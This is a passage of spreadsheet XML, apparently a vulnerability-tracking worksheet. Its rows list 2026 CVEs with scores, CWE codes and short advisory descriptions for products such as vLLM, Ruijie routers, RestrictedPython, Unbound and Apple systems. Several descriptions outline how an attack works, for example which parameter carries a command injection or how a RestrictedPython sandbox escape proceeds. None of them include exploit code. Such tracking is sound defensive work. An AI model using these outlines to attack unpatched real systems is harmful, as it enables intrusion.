          <t>Dell Repository Manager, versions prior to 3.5.2, contains an Incorrect Default Permissions vulnerability. A low privileged attacker with remote access could potentially exploit this vulnerability, leading to Elevation of privileges.</t>
        </is>
      </c>
      <c r="S327" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86359</t>
        </is>
      </c>
    </row>
    <row r="328">
      <c r="A328" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B328" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C328" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87023</t>
        </is>
      </c>
      <c r="D328" s="5" t="n">
        <v>8.5</v>
      </c>
      <c r="E328" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F328" s="5" t="inlineStr">
        <is>
          <t>3938794e-25f5-4123-a1ba-5cbd7f104512</t>
        </is>
      </c>
      <c r="G328" s="5" t="inlineStr"/>
      <c r="H328" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I328" s="5" t="inlineStr"/>
      <c r="J328" s="5" t="inlineStr"/>
      <c r="K328" s="5" t="inlineStr">
        <is>
          <t>tanium:comply</t>
        </is>
      </c>
      <c r="L328" s="5" t="inlineStr"/>
      <c r="M328" s="5" t="inlineStr"/>
      <c r="N328" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O328" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P328" s="5" t="inlineStr"/>
      <c r="Q328" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="R328" s="5" t="inlineStr">
        <is>
          <t>Tanium addressed a path traversal vulnerability in Comply.</t>
        </is>
      </c>
      <c r="S328" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87023</t>
        </is>
      </c>
    </row>
    <row r="329">
      <c r="A329" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B329" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C329" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87030</t>
        </is>
      </c>
      <c r="D329" s="5" t="n">
        <v>8.5</v>
      </c>
      <c r="E329" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F329" s="5" t="inlineStr">
        <is>
          <t>3938794e-25f5-4123-a1ba-5cbd7f104512</t>
        </is>
      </c>
      <c r="G329" s="5" t="inlineStr"/>
      <c r="H329" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I329" s="5" t="inlineStr"/>
      <c r="J329" s="5" t="inlineStr"/>
      <c r="K329" s="5" t="inlineStr">
        <is>
          <t>tanium:comply</t>
        </is>
      </c>
      <c r="L329" s="5" t="inlineStr"/>
      <c r="M329" s="5" t="inlineStr"/>
      <c r="N329" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O329" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P329" s="5" t="inlineStr"/>
      <c r="Q329" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="R329" s="5" t="inlineStr">
        <is>
          <t>Tanium addressed a path traversal vulnerability in Comply.</t>
        </is>
      </c>
      <c r="S329" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87030</t>
        </is>
      </c>
    </row>
    <row r="330">
      <c r="A330" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B330" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C330" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90553</t>
        </is>
      </c>
      <c r="D330" s="5" t="n">
        <v>8.5</v>
      </c>
      <c r="E330" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F330" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G330" s="5" t="inlineStr"/>
      <c r="H330" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I330" s="5" t="inlineStr"/>
      <c r="J330" s="5" t="inlineStr"/>
      <c r="K330" s="5" t="inlineStr">
        <is>
          <t>vllm:vllm</t>
        </is>
      </c>
      <c r="L330" s="5" t="inlineStr"/>
      <c r="M330" s="5" t="inlineStr"/>
      <c r="N330" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O330" s="5" t="inlineStr">
        <is>
          <t>2026-09-12</t>
        </is>
      </c>
      <c r="P330" s="5" t="inlineStr"/>
      <c r="Q330" s="5" t="inlineStr">
        <is>
          <t>CWE-94</t>
        </is>
      </c>
      <c r="R330" s="5" t="inlineStr">
        <is>
          <t>vLLM before 0.28.0 contains a remote code execution vulnerability in the LlavaOnevision2 processor loader that ignores the trust_remote_code parameter when loading remote processor classes. Attackers can craft a malicious model with arbitrary code in processing_llava_onevision2.py that executes with vLLM process authority even when trust_remote_code is set to False.</t>
        </is>
      </c>
      <c r="S330" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90553</t>
        </is>
      </c>
    </row>
    <row r="331">
      <c r="A331" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B331" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C331" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92397</t>
        </is>
      </c>
      <c r="D331" s="5" t="n">
        <v>8.5</v>
      </c>
      <c r="E331" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F331" s="5" t="inlineStr">
        <is>
          <t>cna@vuldb.com</t>
        </is>
      </c>
      <c r="G331" s="5" t="inlineStr"/>
      <c r="H331" s="5" t="inlineStr"/>
      <c r="I331" s="5" t="inlineStr"/>
      <c r="J331" s="5" t="inlineStr"/>
      <c r="K331" s="5" t="inlineStr"/>
      <c r="L331" s="5" t="inlineStr"/>
      <c r="M331" s="5" t="inlineStr"/>
      <c r="N331" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O331" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P331" s="5" t="inlineStr"/>
      <c r="Q331" s="5" t="inlineStr">
        <is>
          <t>CWE-77, CWE-78</t>
        </is>
      </c>
      <c r="R331" s="5" t="inlineStr">
        <is>
          <t>A vulnerability has been found in Ruijie RG-EW3000GX EW_3.0(1)B11P380. Affected by this vulnerability is the function cc_set of the file unifyframe-sgi.elf of the component configChange. Such manipulation of the argument data.url leads to os command injection. The attack may be performed from remote. The exploit has been disclosed to the public and may be used.</t>
        </is>
      </c>
      <c r="S331" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92397</t>
        </is>
      </c>
    </row>
    <row r="332">
      <c r="A332" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B332" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C332" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92398</t>
        </is>
      </c>
      <c r="D332" s="5" t="n">
        <v>8.5</v>
      </c>
      <c r="E332" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F332" s="5" t="inlineStr">
        <is>
          <t>cna@vuldb.com</t>
        </is>
      </c>
      <c r="G332" s="5" t="inlineStr"/>
      <c r="H332" s="5" t="inlineStr"/>
      <c r="I332" s="5" t="inlineStr"/>
      <c r="J332" s="5" t="inlineStr"/>
      <c r="K332" s="5" t="inlineStr"/>
      <c r="L332" s="5" t="inlineStr"/>
      <c r="M332" s="5" t="inlineStr"/>
      <c r="N332" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O332" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P332" s="5" t="inlineStr"/>
      <c r="Q332" s="5" t="inlineStr">
        <is>
          <t>CWE-77, CWE-78</t>
        </is>
      </c>
      <c r="R332" s="5" t="inlineStr">
        <is>
          <t>A vulnerability was found in Ruijie RG-EW3000GX EW_3.0(1)B11P380. Affected by this issue is some unknown functionality of the file /etc/rg_config/admin of the component user_list_note Module. Performing a manipulation of the argument Name results in os command injection. It is possible to initiate the attack remotely. The exploit has been made public and could be used.</t>
        </is>
      </c>
      <c r="S332" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92398</t>
        </is>
      </c>
    </row>
    <row r="333">
      <c r="A333" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B333" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C333" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-20334</t>
        </is>
      </c>
      <c r="D333" s="5" t="n">
        <v>8.4</v>
      </c>
      <c r="E333" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F333" s="5" t="inlineStr">
        <is>
          <t>psirt@cisco.com</t>
        </is>
      </c>
      <c r="G333" s="5" t="inlineStr"/>
      <c r="H333" s="5" t="inlineStr"/>
      <c r="I333" s="5" t="inlineStr"/>
      <c r="J333" s="5" t="inlineStr">
        <is>
          <t>cisco</t>
        </is>
      </c>
      <c r="K333" s="5" t="inlineStr"/>
      <c r="L333" s="5" t="inlineStr"/>
      <c r="M333" s="5" t="inlineStr"/>
      <c r="N333" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O333" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P333" s="5" t="inlineStr"/>
      <c r="Q333" s="5" t="inlineStr">
        <is>
          <t>CWE-710</t>
        </is>
      </c>
      <c r="R333" s="5" t="inlineStr">
        <is>
          <t>As part of Cisco's ongoing commitment to proactive security and product quality, the Cisco Secure Adaptive Security Appliance Software, Cisco Secure Firewall Threat Defense Software and Cisco Secure Firewall Management Center Software engineering team has conducted a comprehensive internal security review. This review resulted in a software hardening release that addresses multiple internally discovered vulnerabilities.
The vulnerabilities tracked by CVE-2026-20334 are related to issues concerning improper adherence to coding standards that are grouped under the Common Weakness Enumeration (CWE) Pillar CWE-710.</t>
        </is>
      </c>
      <c r="S333" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-20334</t>
        </is>
      </c>
    </row>
    <row r="334">
      <c r="A334" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B334" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C334" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-40857</t>
        </is>
      </c>
      <c r="D334" s="5" t="n">
        <v>8.4</v>
      </c>
      <c r="E334" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F334" s="5" t="inlineStr">
        <is>
          <t>cvd@cert.pl</t>
        </is>
      </c>
      <c r="G334" s="5" t="inlineStr"/>
      <c r="H334" s="5" t="inlineStr"/>
      <c r="I334" s="5" t="inlineStr"/>
      <c r="J334" s="5" t="inlineStr"/>
      <c r="K334" s="5" t="inlineStr"/>
      <c r="L334" s="5" t="inlineStr"/>
      <c r="M334" s="5" t="inlineStr"/>
      <c r="N334" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O334" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P334" s="5" t="inlineStr"/>
      <c r="Q334" s="5" t="inlineStr">
        <is>
          <t>CWE-352</t>
        </is>
      </c>
      <c r="R334" s="5" t="inlineStr">
        <is>
          <t>WNC T-Mobile 5G Box IDU router contains a cross-site request forgery (CSRF) vulnerability in the portal.cgi component. The anti-CSRF mechanism fails to validate the csrf_token_value parameter, accepting any arbitrary value as valid. This allows a remote attacker to perform unauthorized actions on the device by tricking an authenticated user into visiting a malicious website.This issue has been fixed in firmware version 1.1.0.651412</t>
        </is>
      </c>
      <c r="S334" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-40857</t>
        </is>
      </c>
    </row>
    <row r="335">
      <c r="A335" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B335" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C335" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-4130</t>
        </is>
      </c>
      <c r="D335" s="5" t="n">
        <v>8.4</v>
      </c>
      <c r="E335" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F335" s="5" t="inlineStr">
        <is>
          <t>security@ni.com</t>
        </is>
      </c>
      <c r="G335" s="5" t="inlineStr"/>
      <c r="H335" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I335" s="5" t="inlineStr"/>
      <c r="J335" s="5" t="inlineStr"/>
      <c r="K335" s="5" t="inlineStr"/>
      <c r="L335" s="5" t="inlineStr"/>
      <c r="M335" s="5" t="inlineStr"/>
      <c r="N335" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O335" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="P335" s="5" t="inlineStr"/>
      <c r="Q335" s="5" t="inlineStr">
        <is>
          <t>CWE-312</t>
        </is>
      </c>
      <c r="R335" s="5" t="inlineStr">
        <is>
          <t>There is a storage of sensitive information in cleartext vulnerability in NI SystemLink. This vulnerability may allow an attacker with local access to obtain sensitive information stored by the system in the clear.  This vulnerability affects NI SystemLink and NI SystemLink Server versions prior to 2026 Q3.</t>
        </is>
      </c>
      <c r="S335" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-4130</t>
        </is>
      </c>
    </row>
    <row r="336">
      <c r="A336" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B336" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C336" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-68955</t>
        </is>
      </c>
      <c r="D336" s="5" t="n">
        <v>8.4</v>
      </c>
      <c r="E336" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F336" s="5" t="inlineStr">
        <is>
          <t>vultures@jpcert.or.jp</t>
        </is>
      </c>
      <c r="G336" s="5" t="inlineStr"/>
      <c r="H336" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I336" s="5" t="inlineStr"/>
      <c r="J336" s="5" t="inlineStr"/>
      <c r="K336" s="5" t="inlineStr"/>
      <c r="L336" s="5" t="inlineStr"/>
      <c r="M336" s="5" t="inlineStr"/>
      <c r="N336" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O336" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="P336" s="5" t="inlineStr"/>
      <c r="Q336" s="5" t="inlineStr">
        <is>
          <t>CWE-427</t>
        </is>
      </c>
      <c r="R336" s="5" t="inlineStr">
        <is>
          <t>The installer for Rakuten Kobo Desktop Application (Windows version) insecurely loads Dynamic Link Libraries. If there is a crafted DLL at the same directory when invoking the affected installer, arbitrary code may be executed with the privileges of the user who performed the installation.</t>
        </is>
      </c>
      <c r="S336" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-68955</t>
        </is>
      </c>
    </row>
    <row r="337">
      <c r="A337" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B337" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C337" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-76825</t>
        </is>
      </c>
      <c r="D337" s="5" t="n">
        <v>8.4</v>
      </c>
      <c r="E337" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F337" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G337" s="5" t="inlineStr"/>
      <c r="H337" s="5" t="inlineStr"/>
      <c r="I337" s="5" t="inlineStr"/>
      <c r="J337" s="5" t="inlineStr"/>
      <c r="K337" s="5" t="inlineStr"/>
      <c r="L337" s="5" t="inlineStr"/>
      <c r="M337" s="5" t="inlineStr"/>
      <c r="N337" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O337" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P337" s="5" t="inlineStr"/>
      <c r="Q337" s="5" t="inlineStr">
        <is>
          <t>CWE-200, CWE-470, CWE-680, CWE-693</t>
        </is>
      </c>
      <c r="R337" s="5" t="inlineStr">
        <is>
          <t>RestrictedPython is a tool that helps define a subset of the Python language for accepting program input in a trusted environment. Prior to 8.4, RestrictedPython could allow a sandbox escape when a custom import policy or globals exposed the standard library string module, the string.Formatter class, a Formatter instance, or a Formatter subclass to restricted code. The string.Formatter methods format, get_field, get_value, and vformat performed attribute and item traversal internally without passing through RestrictedPython's safer_getattr protections. Restricted code could use those live object references to reach function globals, builtins, file access, or code execution primitives, affecting confidentiality, integrity, and availability in the host environment. This issue is fixed in version 8.4.</t>
        </is>
      </c>
      <c r="S337" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-76825</t>
        </is>
      </c>
    </row>
    <row r="338">
      <c r="A338" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B338" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C338" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82049</t>
        </is>
      </c>
      <c r="D338" s="5" t="n">
        <v>8.4</v>
      </c>
      <c r="E338" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F338" s="5" t="inlineStr">
        <is>
          <t>cna@python.org</t>
        </is>
      </c>
      <c r="G338" s="5" t="inlineStr"/>
      <c r="H338" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I338" s="5" t="inlineStr"/>
      <c r="J338" s="5" t="inlineStr"/>
      <c r="K338" s="5" t="inlineStr"/>
      <c r="L338" s="5" t="inlineStr"/>
      <c r="M338" s="5" t="inlineStr"/>
      <c r="N338" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O338" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="P338" s="5" t="inlineStr"/>
      <c r="Q338" s="5" t="inlineStr">
        <is>
          <t>CWE-59</t>
        </is>
      </c>
      <c r="R338" s="5" t="inlineStr">
        <is>
          <t>In CPython 3.13 and earlier, the tarfile module's data and tar extraction filters are vulnerable to crafted archives containing a hard link to a symbolic link. Such archives may cause extraction to modify the permissions or modification time of a file outside the destination directory, or expose the contents of that file within the extracted tree.</t>
        </is>
      </c>
      <c r="S338" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82049</t>
        </is>
      </c>
    </row>
    <row r="339">
      <c r="A339" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B339" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C339" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82717</t>
        </is>
      </c>
      <c r="D339" s="5" t="n">
        <v>8.4</v>
      </c>
      <c r="E339" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F339" s="5" t="inlineStr">
        <is>
          <t>sep@nlnetlabs.nl</t>
        </is>
      </c>
      <c r="G339" s="5" t="inlineStr"/>
      <c r="H339" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I339" s="5" t="inlineStr"/>
      <c r="J339" s="5" t="inlineStr"/>
      <c r="K339" s="5" t="inlineStr"/>
      <c r="L339" s="5" t="inlineStr"/>
      <c r="M339" s="5" t="inlineStr"/>
      <c r="N339" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O339" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P339" s="5" t="inlineStr"/>
      <c r="Q339" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R339" s="5" t="inlineStr">
        <is>
          <t>In NLnet Labs Unbound up to and including 1.26.0, a vulnerability was found in that can progressively corrupt heap memory and under certain systems and compilation options could lead to remote code execution. The vulnerability starts when CNAME synthesis during an upstream response needs to enforce(rewrite) a max TTL value in the packet buffer. Coupled with a compression pointer that points to the overwritten value and invalidates the domain name, it leads to an error path that does not properly move the buffer position and allows for the heap buffer overflow. Since this is heavily reliant on heap memory layout, results are memory corruption that eventually leads to a crash and under specific systems and compilation options remote code execution.</t>
        </is>
      </c>
      <c r="S339" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82717</t>
        </is>
      </c>
    </row>
    <row r="340">
      <c r="A340" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B340" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C340" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84546</t>
        </is>
      </c>
      <c r="D340" s="5" t="n">
        <v>8.4</v>
      </c>
      <c r="E340" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F340" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G340" s="5" t="inlineStr"/>
      <c r="H340" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I340" s="5" t="inlineStr"/>
      <c r="J340" s="5" t="inlineStr"/>
      <c r="K340" s="5" t="inlineStr">
        <is>
          <t>apple:ipados, apple:iphone_os, apple:macos, apple:tvos, apple:visionos, apple:watchos</t>
        </is>
      </c>
      <c r="L340" s="5" t="inlineStr"/>
      <c r="M340" s="5" t="inlineStr"/>
      <c r="N340" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O340" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="P340" s="5" t="inlineStr"/>
      <c r="Q340" s="5" t="inlineStr">
        <is>
          <t>CWE-787</t>
        </is>
      </c>
      <c r="R340" s="5" t="inlineStr">
        <is>
          <t>An out-of-bounds write issue was addressed with improved bounds checking. This issue is fixed in iOS 26.7 and iPadOS 26.7, iOS 27 and iPadOS 27, macOS Golden Gate 27, macOS Sequoia 15.8, macOS Tahoe 26.7, tvOS 27, visionOS 27, watchOS 27. Processing a maliciously crafted 3D model may lead to memory corruption.</t>
        </is>
      </c>
      <c r="S340" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84546</t>
        </is>
      </c>
    </row>
    <row r="341">
      <c r="A341" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B341" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C341" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84580</t>
        </is>
      </c>
      <c r="D341" s="5" t="n">
        <v>8.4</v>
      </c>
      <c r="E341" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F341" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G341" s="5" t="inlineStr"/>
      <c r="H341" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I341" s="5" t="inlineStr"/>
      <c r="J341" s="5" t="inlineStr"/>
      <c r="K341" s="5" t="inlineStr">
        <is>
          <t>apple:macos</t>
        </is>
      </c>
      <c r="L341" s="5" t="inlineStr"/>
      <c r="M341" s="5" t="inlineStr"/>
      <c r="N341" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O341" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="P341" s="5" t="inlineStr"/>
      <c r="Q341" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="R341" s="5" t="inlineStr">
        <is>
          <t>The issue was addressed with improved checks. This issue is fixed in macOS Golden Gate 27, macOS Sequoia 15.8, macOS Tahoe 26.7. An app may be able to break out of its sandbox.</t>
        </is>
      </c>
      <c r="S341" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84580</t>
        </is>
      </c>
    </row>
    <row r="342">
      <c r="A342" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B342" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C342" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84581</t>
        </is>
      </c>
      <c r="D342" s="5" t="n">
        <v>8.4</v>
      </c>
      <c r="E342" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F342" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G342" s="5" t="inlineStr"/>
      <c r="H342" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I342" s="5" t="inlineStr"/>
      <c r="J342" s="5" t="inlineStr"/>
      <c r="K342" s="5" t="inlineStr">
        <is>
          <t>apple:macos</t>
        </is>
      </c>
      <c r="L342" s="5" t="inlineStr"/>
      <c r="M342" s="5" t="inlineStr"/>
      <c r="N342" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O342" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="P342" s="5" t="inlineStr"/>
      <c r="Q342" s="5" t="inlineStr">
        <is>
          <t>CWE-120</t>
        </is>
      </c>
      <c r="R342" s="5" t="inlineStr">
        <is>
          <t>A buffer overflow was addressed with improved bounds checking. This issue is fixed in macOS Golden Gate 27, macOS Sequoia 15.8, macOS Tahoe 26.7. Mounting a maliciously crafted disk image may cause unexpected system termination or corrupt kernel memory.</t>
        </is>
      </c>
      <c r="S342" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84581</t>
        </is>
      </c>
    </row>
    <row r="343">
      <c r="A343" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B343" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C343" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84584</t>
        </is>
      </c>
      <c r="D343" s="5" t="n">
        <v>8.4</v>
      </c>
      <c r="E343" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F343" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G343" s="5" t="inlineStr"/>
      <c r="H343" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I343" s="5" t="inlineStr"/>
      <c r="J343" s="5" t="inlineStr"/>
      <c r="K343" s="5" t="inlineStr">
        <is>
          <t>apple:macos</t>
        </is>
      </c>
      <c r="L343" s="5" t="inlineStr"/>
      <c r="M343" s="5" t="inlineStr"/>
      <c r="N343" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O343" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="P343" s="5" t="inlineStr"/>
      <c r="Q343" s="5" t="inlineStr">
        <is>
          <t>CWE-59</t>
        </is>
      </c>
      <c r="R343" s="5" t="inlineStr">
        <is>
          <t>This issue was addressed with improved handling of symlinks. This issue is fixed in macOS Golden Gate 27. An app may be able to break out of its sandbox.</t>
        </is>
      </c>
      <c r="S343" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84584</t>
        </is>
      </c>
    </row>
    <row r="344">
      <c r="A344" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B344" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C344" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85616</t>
        </is>
      </c>
      <c r="D344" s="5" t="n">
        <v>8.4</v>
      </c>
      <c r="E344" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F344" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G344" s="5" t="inlineStr"/>
      <c r="H344" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I344" s="5" t="inlineStr"/>
      <c r="J344" s="5" t="inlineStr"/>
      <c r="K344" s="5" t="inlineStr">
        <is>
          <t>snipeitapp:snipe-it</t>
        </is>
      </c>
      <c r="L344" s="5" t="inlineStr"/>
      <c r="M344" s="5" t="inlineStr"/>
